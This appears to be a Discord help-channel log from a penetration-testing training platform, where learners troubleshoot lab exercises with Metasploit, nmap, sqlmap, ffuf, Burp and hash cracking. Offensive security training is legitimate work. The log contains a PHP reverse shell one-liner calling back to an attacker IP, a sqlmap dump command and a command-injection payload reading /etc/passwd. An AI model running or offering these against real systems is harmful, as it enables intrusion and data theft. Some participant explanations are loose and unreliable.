#modules
did you try setting options and then running the exploit?
yeah I did
yeah it is and yea connected to vpn
well since you didn't actually say what your issue is i'm running out of ideas. is your monitor on?
let me see what the issues is lool
Exploit completed, but no session was created.
i think its something to do with the hname
im not sure if im entering the correct hname
this generally means that your LHOST wasn't correct
ahh okay let me try again
it means it was able to get the payload set and executed, but the payload didn't call back
RHOST
LHOST
these are the two options you generally always need to think about
i set it to lhost tun 0 but it didnt work
never had to configure hname afaik
the LHOST
LHOST is tun0 (no space)
yea I set it to tun0
ahh I see okay
how do u go about finding the right exploit
I've just done an nmap scan on the ip and looked for open ports
i mean search eternalblue in msfconsole
usually enumerating the services etc
if it's the one that's dealing with eternalblue/eternalromance
but i genuinely don't recall ms05_017_msmq being the exploit used
It had that port open
yes
if it's eternal blue then SMB is gonna be open
there's several exploits for eternalblue/eternalromance
how do i know if its vulnerable to eternal blue?
isn't that literally what this section you're doing is about?
also that's what ms05_017 is
yeaa
maybe they updated the module 😅
no
ahh
the metasploit module yeah?
in general you should always try eternal blue when smb is involved
these are all the ports
don't run --script vuln
okay
just run default scripts
-p-
ahh ok cool
in this case that's not necessary
this section explicitly tells you which exploit to use
even
might not be in the same exact location as your msfconsole search
but the name will be the same
Do i have to use the same exploit? I was kinda hoping to use a new/different one
no
ahh ok
He is sure that it is all the ports, but for that he would have to probe them all with -p-
but there's a handful of exploits related to this vulnerability
you can use any that's related
but msmq is way out of scope
that's literally the only one i would say not to use
damn lool why is that
it's not always accurate 
has the highest rank 😅
sigh
as someone that's done this module
and this section
i'm not gonna have someone double check for more shit when it's not necessary
genuinely don't know how you landed on msmq of all exploits btw
another indicator here is version: Windows 7 - 10 microsoft-ds as an fyi
the windows 7 is the critical part
ahh ok
it's one thing though to recommend scanning for more ports when what they need to exploit isn't there
Anyway, it will be useful for him later.
ok
just RHOST and LHOST need to be set
you don't need to set all the options as in the example, as you can see they're already set by default
yay it worked 😄
same problem
oh wait
did you set the password and user
forgot that is somewhat important
exploit completed but no session

ah
it's the wrong exploit completely
look at the example; use that exploit
AS I SAID EARLIER
just windows/smb/psexec
and the question states "using what you learned in this section" (alongside the first question) should lead you to be using exactly the same exploit
Any idea why target spawning is taking like so much time
The pwnbox spawned fast but the module machine is taking so much time
Someone please guide it's been on loading forever
how long is forever? it takes a while for the target to spawn. it has to build an environment.
30 mins now
refresh page and make sure its not just the widget bugged
otherwise change regions and regenerate your vpn key
happens occasionally
yeah, that’s probably too long. try switching servers?
Having the exact same problem as this person now. Tried using the ||EternalBlue module|| and got back a Connection reset by peer error, tried using windows/iis/iis_webdav_upload_asp as the module suggests only to get a 404 every time. So, if it's not SMB and if it's not IIS, then what is it?
Never mind, running nmap again found another open port that adding the script scan missed.
I have also same problem that spawning target server takes too long. Is anyone having same situation here? It seems there's some technical issue on the background of HTB academy infrastructure.
having same issue
Thanks for your report. Let's be patient and wait for recovery...
I am using xsstrike and it tells me: [+] WAF Status: Offline [!] Testing parameter: s [!] Reflections found: 6 [~] Analyzing reflections [~] Generating payloads [!] Payloads generated: 4608
However, I don't know where I can see which payloads resulted in a successful reflection.
what module/section
Cross-Site Scripting (XSS)
Skills Assessment
I wonder if there are any plans for cloud related content in academy 🙂
idk i did manual enumeration
xsstrike didn't work for me in the assessment
its a simpler payload than you expect
Xsstrike is like linpeas or linenum imo, throws a bunch at you that makes things harder to parse
At least if you don't know what you're doing*
Yes, I solved it with manual enumeration a few minutes after the question, but I still have that doubt of not being able to use that tool. Some time before I had also had problems with it and it bothers me not to be able to do it.
how long should it take to find the "You don't have access!" page in the ffuf skill assessment? feels like i been here for hours
```
bitlocker2john -i Backup.vhd > backup.hashes
Signature found at 0x1000003
Version: 8
Invalid version, looking for a signature with valid version...
Error while extracting data: No signature found!
```
why am i getting error ?
Perhaps the file got corrupted in transit
but why ?? and what i do i simply try get filename
If you utilize the search feature I've shared the md5sum of backup.vhd
If it doesn't match: file got corrupted in transit
same happened to me
Could have been a momentary disconnect
i thought it was done cause i saw the connection come back
they are same
¯\_(ツ)_/¯
u got help for me 😭
bruhh my luck is worst i think
wait i think i got it
Bro it is 2 am and I am not movin
either that runner machine is also not working i plan to do it again before ippsec video
Also your message had spoilers in it considering you have to fuzz for the subdomain
Also, were you using the right thing
Time.Started.....: Sat Aug 24 11:24:57 2024 (11 secs)
Time.Estimated...: Thu Sep 19 16:35:15 2024 (26 days, 5 hours)
Estimated time != actual time
Estimated is if it has to go through the whole list
Which it won't
Htb isn't that mean
ya but i am amazed

Actual time could be higher than the estimated time tho
No?
Like huh?
Lol
which is the most brainfck module according to yu?
anyone who has finished module Intro to C2 Operations with Sliver, can I get a bit help, kinda stuck
password cracking is probably constant time so if it is longer it's not by a significant amount
Time.Started.....: Sat Aug 24 11:28:44 2024 (4 mins, 21 secs)
Time.Estimated...: Mon Sep 30 22:40:47 2024 (37 days, 11 hours)
hell no
means?
it means you are going to wait
ya i should inject some caffeine
Not everything is instant gratification
are u cracking it on ur host os?
in office ryt now 🤣
it took me about 12 secs
yup

Can I DM you for something?
ya i am using rockyou
i was NOT waiting for 14 million passwords 😭
it exists in both technically
You wouldn't have to bro
true
It would stop after it hit the first one
but i know its in the mutated tho
Yup
Silent lessons here
Always start small then go big
You have resources from the module, try those first
okk but like after cracking like i have to mount it ?
Finally cracked !
if it's something i can answer
Does anyone know what does a Pwned message in CME or NXC mean specifically on the LDAP protocol?
For SMB it means local admin, for WinRM it means access via WinRM but for LDAP?
they all mean admin afaik
i can query ldap with a non-pwned message user
that's what confused me, the user has no admin anywhere, yet BloodHound marks it as a high value user part of a tier 0 group. yet I have no idea what this user can even do
pwned means admin
and how do you "leverage" admin on LDAP do say
hash dump is a good one
actually not sure you can hash dump with ldap
you can do crackmapexec ldap -L to see the modules
Hi, I am doing this module: https://academy.hackthebox.com/module/58/section/526
I am using sqlmap, but sqlmap is detecting the column name wrong. It is off by one character due to which the data is not dumped correctly. Did any of you also face the same issue?
yeah i think i just inferred the answer with leetspeak
Via nxc I need SMB rights to dump hashes. But I see there might be a way to do it via LDAP as well but different tool
cme ldap is great for enumeration stuff
yeah but i can enumerate without having the pwned message. my guess is I have write DACL privileges
yeah that's correct. but pwned means admin account so you can enumerate more
Yeah iirc it's bc of the attack used to get the answer
I think I asked Jared about it or posted an #1234357888114364508 a while ago
Yeah I think so. It mangles the data.
It's dumb lol
Every time I run the same command, I am getting different values(off by one). Does this mean that we cannot completely rely on sqlmap if the attack is blind?
Yes, that’s why you have to run it a couple of times
There’s also a tool called Ghauri, which sometimes works better than sqlmap with blind types
Thanks!
you can also changed the msg as well. i changed mine to 'OWNED!' . figured it would look better for screenshots lol
there are some commands in LDAP that will local require admin, i.e. getting list for trusted delegation, password-not-required, gmsa.
at work I have it as Local Administrator
yeah for this kind of answer i was looking for, thanks
no problem. i dont use the LDAP query much. you can do hash dumps with the smb protocol. though for NDTS im unsure if thats in LDAP or not.
i do recommend the CME course. im 3/4 through it, but loving it. its been super useful.
Hi, anyone can help ? Idk why the version's not showing
I've seen some others face this, respawning the target fixed it for them. You can try that
Still not appearing
You tried with -p 53 --script dns-nsid -sSU
sqlmap 'http://94.237.60.129:45661/case2.php' --compressed -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Referer: http://94.237.60.129:45661/case2.php' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://94.237.60.129:45661' -H 'Connection: keep-alive' -H 'Upgrade-Insecure-Requests: 1' --data-raw 'id=2' -batch-dump -T flag2
why i cannot find the flag with this command ?
-T specifies a tablename, i'm not certain but maybe the tables are named differently
If I'm not mistaken batch and dump should be used with --batch --dump
getting stuck on the getting started module in the pen test career path on the knowledge check page... https://academy.hackthebox.com/module/77/section/859
I've made it into the admin portal of the target, and am trying to modify the Theme template.php by adding a php reverse shell one-liner.. <?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.2.15 9443 >/tmp/f"); ?> .. when I do this, the page won't load at all
so I tried using <?php system('id'); ?> which works perfectly fine and I can see the ID in the home page..
that doesn't look like the IP of the tun0 interface
I have openvpn running on my local machine, vm is running the attack which has that IP
no problems reaching the target on the vm and that IP can ping the target
Yes, but the target is trying to reach back to you this time.
It does not know that the IP of your VM is behind the IP of your host system.
Best and easiest solution would be to run the VPN within your VM
lol I've literally been on this for like 2 hours..
that worked 🥲
the vpn should be a split tunnel, right? I quit using it inside my vm bc I can only reach the internal network.. anything external gives me an unknown host error
yes, you should be able to see that with ip route
that's weird.. does parrot have vpn settings by default to block all external network traffic when vpn is enabled?
the owasp hud doesnt show me the tools anymore and i have to do it from the zap application did i do something wrong?
No clue, I have never used Parrot, but I highly doubt that
thoughts on troubleshooting? again, with vpn on, only internal network traffic is being allowed
Check the default gateway and DNS server (it's always DNS)
10.10.0.0 is default gateway?
if it is, then that's your problem
let's move this to DM to not clutter this channel
sorry if asking in wrong channel but where do i start with learning in htb? all i know my linux basics + pentesting basics
choose a path or a module that's interesting and start learning 🙂
well i need from the very start like a whole guideline cause im very confused
what's your end goal? certs? learning?
i can't figure out how to write the request in the url in a way that it gives me the flag
you were able to see /etc/passwd, right?
yea.
ok so you have access to the system on some way, you just have to look for the flag in normal locations
i just don't get how to rewrite the request to give me the flag. just writing &cat /flag.txt& doesnt work
i have to parse it somehow but i cant remember how
so I don't know zap but decoder in burpsuite (or even cyberchef) can help with encoding your commands
I'm Japanese, but I want to make a hack BOT, please let me know.
alr so i decoded the url request, changed it to /flag.txt encoded it back but it gave me nothing
did you try ls
Exploitation & Privilege Escalation section of Attacking Enterprise Network. question is how i can browse the 172.x.x.x with proxychains?
any hint?
blank page
i can't figure out how did zap encode it
when i run it through cyberchief(i decoded and encoded back) it changes my request and it doesn't work anymore
so do you know what %26 is decoded?
it's explained in the previous section
so unix commands in general are separated by ; so you are asking the system to ping 127.0.0.01 then ; then <insert another command here>
wasnt it & or | ?
| is to pipe output to intput
& is to put something in the background
so basically when you are doing command injection, you are saying 'sure sure, here ping this but then give me my command'
so you do ping 127.0.0.1;cat /etc/passwd; initially
now you want to see what is in the root directory (/), you want to take the above and modify it to do ls /
it worked using ;
cheers for letting me know
i just cant figure out why when i decoded it took ; as &
interesting
i can send you the cyberchef screenshots in dm if you'd like
or leave them here
nah its ok, I usually just use burpsuite decoder unless I need other encoding types
need a hint in api attack skill assessment, guys
Hello I'm stuck too. Can I send you a PM to see if I'm on the right track?
You can DM me what you've done.
Has anyone solved Sea machine
Read and follow #welcome ; #1271890150863143096
working on a write-up for this lab https://academy.hackthebox.com/module/77/section/859
in the final section, I've found how to get the root flag, but I'm unable to upgrade my TTY.. probably how I've started my admin shell, but am I allowed to show the code?
You're root brother
ya I've got the flag, the terminal is just all fucky tho
Wdym "fucky"
in the second picture.. the blinking [] showing where you'd normally type in the line is beneath the root@gettingstarted:...
You get used to those things, you're not in a perfect shell
so anything I type isnt actually coming on the line I can see
I generally haven't gone as far as upgrading shell with background/stty
Usually just the python upgrade works for me
ocd 😛
Deleted your images as they contain the command to privesc
Also ocd is a killer in this field
You will have to deal with imperfections
Especially with reverse shells
They aren't exactly stable
The barebones minimum is it runs the command you tell it
If you want a stable shell see if there's an id_rsa in the /root/.ssh directory
Good morning, I am struggling with the Windows event logs module question 1 "Analyze the event with ID 4624, that took place on 8/3/2022 at 10:23:25. Conduct a similar investigation as outlined in this section and provide the name of the executable responsible for the modification of the auditing settings as your answer. Answer format: T_W_____.exe"
Steps taken so far: I filtered the security logs by Event ID. I then found the event 4624 identified in the prompt. Took screenshots so I have the Logon ID. From there I need to find the executable. When I filter by the Logon ID I found using the XML query example listed in the module there are still thousands of events. I tried honing in on event IDs 4907 originating from the login ID I grabbed but there are still 100s of entries none of which are matching the prompt. Does anyone have any advice on what to try/additional resources I should take a look at? Already read the linked articles in the module. Thanks!
Basically replicate everything from the section, substituting the found ID where applicable
Also make sure you're looking against the right event id
Make sure you look around the same time as well
Great thank you very much for the quick response and those links, diving back in!
Not saying either of those would be right/wrong
Just offering insight on what logs may contain data about an exe
Yeah that is super helpful no matter if they are the ones. I am also going to pay closer attention to the date/time to try and narrow that down, thank you again.
Mhm
Im doing Attacking Thick Client Applications and I cannot find the Matt user after running the command .\Restart-OracleService.exe also in Procmon64 I get this C:\Users\cybervaca\AppData\Local\Temp\69DD.tmp\69DE.tmp\69E0.tmp
I cant figure out a way to both add the character to the cookie and encode the entire cookie at the same time in burp
i tried using cluster type attack but didnt work
The user of the example is Matt but it's not your case. Replace the user with the name of the cybervaca user and disable inheritance in the temp directory in the options so that everything is displayed in the same directory as indicated in the course
Then you will have to modify the .bat file
What is section and module ?
Skills Assessment - Using Web Proxies
Shit I didn’t take notes for the skill assessment I’ll do it again and I’ll tell you again by then if no one helped you
i have to change the cybervaca to Matt? Also I cannot change the inheritance because its already disabled
yes
i looked up a walkthrough and got the idea to use the decrypted cookie as prefix and select the cookie in the request as payload for all alphanum characters but it gives no response
well so what you are supposed to do there is you have 31 characters, you add a character, then encode it in the same order you decoded it
is that what you did? does what you are sending back look like the expected encoded character?
What I did was that I disabled inheritance at the time of cybervaca and I was able to have the file in a directory named with a number (me it was 2)
these are the payload settings
i think you mean decoding it after adding a character?
ok so that looks right
but then you are going to have 62 responses, one of those responses will look right
or one of those responses will stand out and look right
they are doing it right, encoding after adding character
nvm i figured it out
Also uncheck the delete subfolder and files option and delete in display advanced permissions
it was intruding on the whole site not just /admin.php
maybe this fixes it
well I have only to enable inheritance is this normal?
oh oops
if it was already disabled then it's not normal, but you can go forward or restart if you're paranoid
Look carefully once you have disabled the inheritance you must click on convert inherited permissions into explicit permission on this object -> Edit-> display advanced permissions and from there you can uncheck the boxes delete subfolders and delete
huh?
Oops, I was talking to @slate halo sry
For using proxy I redo the skill assessment I made the mistake of not taking notes 🤦🏾♂️
nah
didn't work. no response
yeah but you said you were doing wrong url, right?
A handful of them give the answer afaik
yeah I think it is more than one
Afterwards it's just adding the cookie to browser to bypass login
yea i just cant figure out how to configure the burp intruder to work
Well once you get the cookie
Also intruder has 2 tabs
Request and response
Instead of viewing the request, view the response :)
You can also filter response size
it gives no response
i think i forgot to send a pic
instead of a response it says it produced and error
Im working on Information Gathering - Web Edition - Skill Assessment.
Is there something I have to do to get tools to properly work on it. I am not getting anything from subdomain enumeration, reconspider or finalrecon.
I have the hosts ip with inlanefreight.htb on /etc/hosts...
You can DM your intruder config if you'd like.
already posted it
.
Are you sure you're encoding them in the right order?
And what are you getting when you run it? You can DM that if you'd like.
first base 64 then ascii
response 0
no code
what are you looking for help with exactly
in this order cyberchef decoded it
that's hex and base64
^
Specifically I am on Q3 but like I mentioned I am having issues (it appears) getting anything out of the webserver. It appears to only have the index page
There's just one more thing I would check in your intruder settings.
Ascii hex is selected
ahh yeah
As the second encoder
sorry i haven't had my coffee yet
feel free to dm me
when i hear ascii i think text pics haha
Did you check your robots?
Also if you don't find something, fuzz for subdomains
Add the subdomain to /etc/hosts --> repeat
I am not finding anything on the subdomains either
What is your syntax?
and theres no robots
For fuzzing
for directories
ffuf -c -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u http://inlanefreight.htb:45187/FUZZ -recursion-depth 5
for subdomain
ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://FUZZ.inlanefreight.htb:45187
That's why it's not working
That's not how you fuzz vhosts
-H "Host: FUZZ.inlanefreight.htb"
his -u parameter needs to be changed too
Yeah sorry I was eating something
let me try that
review the vhost enumeration section again and it'll give you the command
-u http://inlanefreight.htb:port -H "HOST: FUZZ.inlanefreight.htb"
gobuster vhost command not gobuster dns
gobuster vhost -u http://inlanefreight.htb:81 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain
Replace :81 with the port
yea i know
The :81 is just to show you can specify the port
its just the copy paste from the notes lol
the built in browser keeps giving error codes 400 everytime i enter the site for no reason on zap
i think imma just give up for now
This works, but the go buster still doesn't work
actually I think the ffuf doesnt work either
move on and maybe do it later. i think i got the jist of it
400 means the server got your request, but it's a bad request.
its giving 200 on everything it looks like
Dude I just spun it up for funsies and got it. Don't give up yet.
my request is http://ip:port so its a good request
that's all you have in your request? that is not a valid request
Filter by response size
-fs <common size you see>
literally how I can't comprehend what i am doing wrong. i even looked up a video of some guy doing it, did exactly what he did and got nothing. this and the first question keep bugging me because i dont get what im doing wrong
I'm not using ZAP, so I could help walk you through it in Burp. Just let me know.
if you can dm me what you did in burp i would appreciate it
I looked at your pic and the question, you're trying to replace the whole cookie instead of just the last character like the question tells you to
the question says it's a md5 hash that's missing the last character, and in sniper you have the entire cookie selected instead of fuzzing just the last character.
i assigned the whole cookie as payload, put the cookie as prefix, put the alphanum case.txt as payload and added the encodings
well you have to add the missing character then encode the whole cookie
I'll send you a DM, but I'm going to nudge you in the right direction.
fair enough
He put the md5 prefix on
ok i see that in the other pic. this pic still looks weird to me. he has a cookie: header with a value of phpssid and then another cookie value so it looks weird to me but i can't remember off the top of my head if it's supposed to be that way. the module and section would help a lot.
Yeah it's silly
i found it, web proxies. looks like it is supposed to be that way.
Yeah
¯\_(ツ)_/¯
Ik there's some that should give an output
Been a minute though
I think I understand your problem when you fuzz with intruder the last character to be found in the ALPHA-NUME CASE list must first be encoded in hex.
each payload gives a response, but only one has the flag
Ye
there's also a step he needs to perform before that fuzz will work
I thought I did it like they did, added character then encoded entire string
not sure if he did that or not
but think ricky is helping them out
can you delete those pics? they kinda spoil the skill assessment
Hey what do I do if the verification link to my email isn’t working??
Probably reach out to support staff
¯\_(ツ)_/¯
nvm it worked just had to uncheck the bottom checkbox at the bottom of intruder
also i think i encoded in the wrong order
shit happens
now you will never forget
yup
encode special characters?
Anyone willing to donate me a voucher on htb ehehehehe
i think this is what did it
Nope
It's bad when you run out of cubes
very important setting
Indeed
But spending money will prevent that

I'm kidding, don't ban me
In Brazil, spending in dollars has to be rich
¯\_(ツ)_/¯
I think they said you can win a silver membership during trivia
so maybe look for opportunities to win cubes/membership
Participate in seasons
you can also win stuff through #giveaways
I don't have access, it must be because I'm new to the server
Read and follow #welcome
Hello! I'm in the "Linux Fundamentals" module and I have come across a confusing question.
I have to download the contents of a website (https://www.inlanefreight.com/) and count all the unique paths of this domain
so far I have tried this curl https://www.inlanefreight.com/ > inlanefreight.txt followed by cat inlanefreight.txt | grep https://www.inlanefreight.com/ | sort -u | wc -l
it doesn't seem to work
what section is this? usually the commands and what not are within the section
do you guys have any hints i could use? i don't want the straight up answer, just something i could use to advance
Filtering Content.
downloading an entire website seems extreme
it's a small file
how do I contact hackthebox support through email?
22266 (the size)
Look at the source code. It can also have other domains or relative paths
Need to speak to a person? Learn how to reach our support via HTB Labs.
^
yeah sounds like source code is the way
i'm seeing a lotta href's and src's using that path
there are also many that are just https://www.inlanefreight.com/ without anything following it
If I contact them through email they won’t respond till Monday right??
are those also paths of the domain or just the domain itself?
href would be a link
Support works reduced hours at the weekend
src="path/to/file.jpg" is also a path
I’m just tryna get the student discount but the verification link isn’t working 😭
then i should filter with grep by doing "href='https://www.inlanefreight.com/'" ?
this is pretty difficult for me at the current moment haha
i cant wait to look back on this day in a few years and realize how i've grown. but first i gotta solve it 💀
I'm looking at it now, I'll say one thing you'd want to do is do a bit of trial and error
so you kind of do a grep, see what you see, then try to figure out what to make of that
Then you have to contact support and wait. This is not something we can solve on Discord
cat inlanefreight.txt | grep "href\|src='https://www.inlanefreight.com" | sort -u | wc -l
this didn't work either
wait i see why
well you got a lot of junk there
there are also href and srcs with double quotes instead of single quotes
I know I emailed them
Check out all the other filter options discussed in the module
there was another path with double quotes, 60 in total, but that's not the correct answer either
you got cut, tr, awk all available to you
what if I said your goal was to just get the url?
hear me out. what if i use tr to replace every " " with a new line to have everything on one line, THEN grep for href and src?
not a href, not any tags, nothing?
then i would probably separate the path from href and src
may be a good thing to try to see if that gets you closer to your goal
gave me 47 this time.
cat inlanefreight.txt | tr " " "\n" | grep "href\|src='\|\"https://www.inlanefreight.com/" | sort -u | wc -l
are you looking at the output before you do a wc -l, I mean you might be on the right path
why are you doing href\|src=
that is grabbing anything with href
not specific to inlanefreight
i grouped (href|src)
it gave me 18 results now
href="https://www.inlanefreight.com/"
href="https://www.inlanefreight.com/index.php/about-us/">About
href="https://www.inlanefreight.com/index.php/career/">Career</a></li>
href="https://www.inlanefreight.com/index.php/comments/feed/"
href="https://www.inlanefreight.com/index.php/contact/">Contact</a></li>
href="https://www.inlanefreight.com/index.php/feed/"
href="https://www.inlanefreight.com/index.php/news/">News</a></li>
href="https://www.inlanefreight.com/index.php/offices/">Offices</a></li>
href="https://www.inlanefreight.com/index.php/wp-json/"
href="https://www.inlanefreight.com/index.php/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.inlanefreight.com%2F"
href="https://www.inlanefreight.com/index.php/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.inlanefreight.com%2F&format=xml"
href="https://www.inlanefreight.com/index.php/wp-json/wp/v2/pages/7"
href="https://www.inlanefreight.com/">Inlanefreight
href="https://www.inlanefreight.com/">Inlanefreight <br>
href="https://www.inlanefreight.com/">Services</a></li>
href="https://www.inlanefreight.com/wp-includes/wlwmanifest.xml"
href="https://www.inlanefreight.com/xmlrpc.php?rsd"
url("https://www.inlanefreight.com/wp-content/themes/ben_theme/images/breadcrumb-back.jpg")
i dont get what that url thing is at the bottom though
it doesn't start with href or src
i can't get do this yet
i need something to solve it
@trim frost cat inlanefreight.txt | tr " " "\n" | grep https://www.inlanefreight.com/ | sort -u | wc -l gives me 38
cat inlanefreight.txt | tr " " "\n" | grep https://www.inlanefreight.com/ | sort -u | tr "'\|\"" " " | awk '{print $2}' I separated the URLs
now I see that there are many single https://www.inlanefreight.com/ URLs with no subdomains
like, no a/b/. just a/
you might wanna delete those
you are so close though, just double check what you see before you wc -l
i have to single out the ones that are EXACTLY the plain path and leave out the ones with more / s in them
@trim frost I counted everything as it was and then removed manually the ones that weren't subdomains. it gave 33, but that wasn't right either.
i'm tired. i will continue tomorrow. this is a bit frustrating
just double check everything, but yup, I'll say you are close
Module: Attacking Common Services -> Attacking SMB -> Third task:
cant login to the system with SSH
||ssh -i id_rsa jason@10.129.74.159||
btw it didnt give me any error
If the rsa key isn't written properly it falls back to password authentication
usually if you don't chmod 600 it'll yell at you to set the permissions correctly so that's why I'm assuming he has already done that
unless you mean the rsa key content itself is wrong
If it's missing the -----BEGIN
and
-----END
lines then it will silently fail
Also fun fact it works with x00 so long as there's no permission for g/o
yeah the host is up, and already did a chmod 600 on the private key
it's still hanging
Try putting the -i id_rsa at the end
This feels like it's having a timeout issue, when you ping - what's the latency?
Do you have only 1 vpn running?
Do you have pwnbox running?
Did someone face this issue?
I have only one VPN, my average latency is 40 ms and I use my host machine not the pwnbox
Hm
There's some routing that isn't happening then
Change vpn regions and download a new vpn
see if you can get any logs with -vN
ssh [...] -vN
but yeah weird
sometimes instances will just die
Hello everyone. I had a question about a lab on page 7 of Web Requests POST. I'm trying to get the flag but I'm not able to get a search response because it says that it's been blocked by CORS policy: No 'Access-Control-Allow-Origin' header is present on the requested resource.
Any ideas on how to overcome this issue?
try resetting your computer
or making sure all your stuff is up-to-date
it's working, I had to add this parameter XD :
-o KexAlgorithms=ecdh-sha2-nistp521

Password Attack Labs done.
congrats
that was cool. A couple tricky bits but not bad at all.
modules are insanely cool on htb
a bit of a stupid question here
I was reading about PtH attacks and I was wondering. Since we can do so much with the hash itself, what is the point of cracking the hash and obtaining the password, other than the possibility of password reuse?
Is fraud got real
I guess not everything accepts a hash (e.g. networking equipment) so I'd want that as an option. Plus if you know what the password is you could wager a guess at what other passwords might be (e.g. s3cr3t_1.. _2.. _3.. _4)
?
Fraud gpt
You can't always authenticate with a hash
Ai tool for hacking
This isn't the place
What are possible situations where I can't PtH?
ntlm can be disabled
Where is the place then
usually when you send a plain password to the server it will apply a hash function to compare with the hash on the server side
fraud gpt
Uk fraud gpt
Never heard of it but I'm not engaging much in it
This isn't the channel for this conversation
idk what that is 💀
No, I mean domain- and Windows-wise, not in web apps
I can't access other channels
I learned this the hard way by experimenting: Sometimes policies are put in place that prevent the use of hashes to authenticate with RDP as I found out in one of the modules by attempting to use wlfreerdp /u:Administrator /pth:<SNIP> to access a target box — those kinds of issues still need to be worked around as such.
It apparently is a darknet tool
Meaning it's fucking illegal
And has 0 place in this discord
Isn't domain and Windows the main place where NTLM auth happens?
^
yeah
NTLM is the fallback authentication protocol if Kerberos cannot be negotiated
But if a domain is configured properly, it will enforce kerberos authentication
ok, if I have the NTLM hash can't I just forge tickets?
You'd need to find a way to get NT AUTHORITY\SYSTEM privileges on the target to do that.
And because the SYSTEM account is locked by default there isn't going to be any hash to pass.
ok, from what I see here, you usually get the hash when you have SYSTEM privs, but then you don't need that hash anyway to get that TGT and forge tickets. So if I found the NTLM hash somewhere else and NTLM auth is disabled, I need to crack the hash to auth, right?
Pretty much
BRO CAN YOU HELP ME
Do I need NT Auth exclusively, or any local admin?
I DIDNT FIND IT
And in cases of ntlm auth disabled, lm hashes are disabled
What do you mean by shout
Caps lock
we still have these
?
Yes
The format of an ntlm hash is lm:nt btw
If lm is disabled it's usually filled with a bunch of aaaaaaaaa
I mean they were disabled long ago, right?
No
or not in use or something
Lm hashes are still very much in use by misconfigured systems
🥲
no
Where I can see this stuff?
Just because it's recommended to disable lm hashes, doesn't mean they are @midnight galleon
See what?
okeyyy thanks for the help

Local admins are like accounts that have /etc/sudoers entries on a Linux machine. Even if you have access to one of them, UAC is still likely to intervene and prevent you from having any access to the krbtgt or other Kerberos stuff — and by default, because UAC requires a graphical environment, that means you need to use RDP as a local admin to do that. By default, RDP is set up in such a way that you'll get an error message if you try to pass-the-hash of a local admin account to access it, as I did when I attempted to do just that in the Metasploit module.
Makes sense, thanks for help
hi guys can anyone please help me with this module? Password Attacks part Passwd, Shadow & Opasswd
i am stuck
I dont think so
I am mobile, but if nobody else offers to help you can DM me questions / what you're trying. I've refreshed my memory on that section recently and can offer some help but -- again -- I'm not at my deck with notes.
do i have to complete the Information Security Foundations path before starting to learn the other stuff?
Examine the target using the credentials from the user Will and find out the password of the "root" user. Then, submit the password as the answer.
If you already know everything that is taught in this path, you can skip it.
it's mostly psychological stuff bla bla bla
No, the path contains a lot of basics that you need to know in order to understand the other content
What path do you recommend after finishing the foundations path?
complicated, but you can UAC bypass from the CLI
That depends on your interests.
CBBH for web hacking
CPTS for network hacking
2024-08-24 16:41:53 Data Channel: cipher 'AES-256-CBC', auth 'SHA256', peer-id: 0, compression: 'lzo'
lemme try
hi
lemme try
Yeah, getting started with that one tripped me up. Consider using some techniques and lists from previous sections.
@acoustic owl
How can I fix that? Already terminated and deployed a new one, still the same
ssh?
This is a box, #boxes and that just means you're not connected to the vpn
Everything is correct, and there are no spaces. Why is it marking it as incorrect? It's the Shells and Payloads module
Already done, same error
Can you explain?
That might be the symlinked location, not the actual location
Is it an issue with the HTB machine or my PC?
Can I use the HTB Academy Pwnbox for those machines?
/usr/s../w../la../a../shell.aspx
Did you copy the path directly or type it out?
Also try refreshing the page and inputting again
No
I type the path manually
Copy/paste the path from the pwnbox terminal
So that you can ensure no typos
I terminated and recreated it again but s
```text
[17:18:46:793] [260104:260105] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[17:18:46:794] [260104:260105] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[17:18:46:794] [260104:260105] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[17:18:46:794] [260104:260105] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1
```
Different error from lockout
Try +clipboard instead of /clipboard
Also in future wrap the errors and code output in ```
oki got it
no
'xfreerdp /v:10.129.66.142 /u:htb-student /p:'HTB_@cademy_stdnt' +clipboard /cert-ignore'
Are the creds correct?
Maybe I have messed up
The server responds with Login failure
Man, I am so sorry
It was a mistake from my end so sorry for wasting your time on this silly thing
No problem
Always read the error message 😉
Gotcha Thanks, @fathom pendant Thanks it's resolved now
I'm having trouble with the SIEM skills assessment. It won't connect to the target on port 5061. "This address is restricted
This address uses a network port which is normally used for purposes other than Web browsing. Firefox has canceled the request for your protection."
I've tried kicking both boxes and redownloading the vpn connection files.
Do you have any idea why it's giving me the error? There are no spaces, it's correctly written, and I’ve already refreshed the page
Because the answer is wrong, I guess
The question is asking for the path
the path is complete
/usr/s../w../la../a../shell.aspx
I just joined the academy...
you'll learn a lot, I'm sure
https://academy.hackthebox.com/module/51/section/467 kernel exploit... I used the correct exploit file and even got a root shell, but why is it showing permission denied?
Hi!
Can you help me with these questions? I'm doing something wrong, but what???
RE: the cors misconfig guy. your code is off, review the module's examples.
What does "my code is off..." mean?
I was talking to a guy whose message got deleted
I got it
thank you
The message contained code parts, that's why I deleted it
please, tell me who can help me with my question?
Could someone help me on broken authentications skills assessment?
What exactly is not working?
Please just provide the module name, section name and your syntax
Could i dm you my payload?
I found the username but I'm not sure why I'm not able to brute-force the password with ffuf
Avoid spoilers as much as possible
sure
If you're getting a lot of results. Consider filtering by a different method
-mc 200 matches response code 200, but an incorrect fuzz value may not give a different code from 200
Look for other things you can filter by
Like size
Looking for 1 for ctf competition (not promo) there is a prize pool btw
